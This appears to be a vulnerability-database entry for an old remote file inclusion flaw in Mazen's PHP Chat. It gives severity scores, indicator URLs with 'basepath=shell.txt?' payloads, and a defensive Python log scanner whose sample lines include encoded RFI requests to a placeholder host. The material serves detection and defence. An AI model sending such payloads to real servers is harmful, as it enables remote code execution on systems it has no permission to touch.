CVE-2007-2939
published 2007-05-31


Priority P3 · 51 · medium · 6.8 · CVSS 2.0
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 64.03% (99.1th percentile)
Multiple PHP remote file inclusion vulnerabilities in Mazen's PHP Chat 3.0.0 allow remote attackers to execute arbitrary PHP code via a URL in the basepath parameter to (1) ITX.php, (2) IT_Error.php, or (3) IT.php in include/pear/.

Affected

1 range
Vendor | Product | Version range | Fixed in
mazens_php_chat | mazens_php_chat | |

Detection & IOCs (extracted from sources)

url: http://victim.com/[chat_path]/include/pear/ITX.php?basepath=shell.txt?
url: http://victim.com/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?
url: http://victim.com/[chat_path]/include/pear/IT.php?basepath= shell.txt?
path: include/pear/ITX.php
path: include/pear/IT_Error.php
path: include/pear/IT.php
  • Detect HTTP GET requests targeting include/pear/ITX.php, IT_Error.php, or IT.php with a URL-like value in the 'basepath' query parameter — indicative of remote file inclusion exploitation.
  • The RFI payload appends a trailing '?' to the injected URL (e.g., shell.txt?) to nullify any appended local path suffixes — monitor for this pattern in 'basepath' parameter values.
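
The two detection notes above, applied to web server access logs. This is an added example, not code from the advisory or its sources. It assumes common/combined log format; `check_line`, `scan` and `SAMPLE_LOG` are hypothetical names, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Script paths named in the advisory, lower-cased for comparison.
TARGETS = ("/include/pear/itx.php", "/include/pear/it_error.php", "/include/pear/it.php")
# Request field of a common/combined-format access log line (assumed format).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# "URL-like" here means the value starts with an explicit scheme (http://, ftp://, ...).
URL_LIKE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)

def check_line(line):
    """Return the reasons a log line matches the advisory's pattern, or []."""
    m = REQUEST.search(line)
    if not m:
        return []
    # Split at the first '?' only: the payload itself ends in a second '?'.
    path, _, query = m.group("target").partition("?")
    if not unquote(path).lower().endswith(TARGETS):
        return []
    reasons = []
    # parse_qs percent-decodes once, so encoded and plain values compare equal.
    for value in parse_qs(query, keep_blank_values=True).get("basepath", []):
        value = value.strip()
        if URL_LIKE.match(value):
            reasons.append("url-like basepath")
        if value.endswith("?"):
            reasons.append("trailing '?' in basepath")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every matching line."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = check_line(line)
        if reasons:
            hits.append((n, reasons))
    return hits

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/May/2007:10:00:01 +0000] "GET /chat/index.php HTTP/1.1" 200 512',
    '192.0.2.77 - - [31/May/2007:10:00:05 +0000] "GET /chat/include/pear/ITX.php?basepath=http://files.example/shell.txt? HTTP/1.1" 200 40',
    '192.0.2.77 - - [31/May/2007:10:00:09 +0000] "GET /chat/include/pear/IT_Error.php?basepath=http%3A%2F%2Ffiles.example%2Fshell.txt%3F HTTP/1.1" 200 40',
    '192.0.2.10 - - [31/May/2007:10:00:12 +0000] "GET /chat/include/pear/IT.php?basepath=/var/www/chat/ HTTP/1.1" 200 40',
    '192.0.2.10 - - [31/May/2007:10:00:15 +0000] "GET /search.php?basepath=http://files.example/ HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(n, "; ".join(reasons))
```

Access logs record only the query string, so a `basepath` value sent in a request body would not appear in this data.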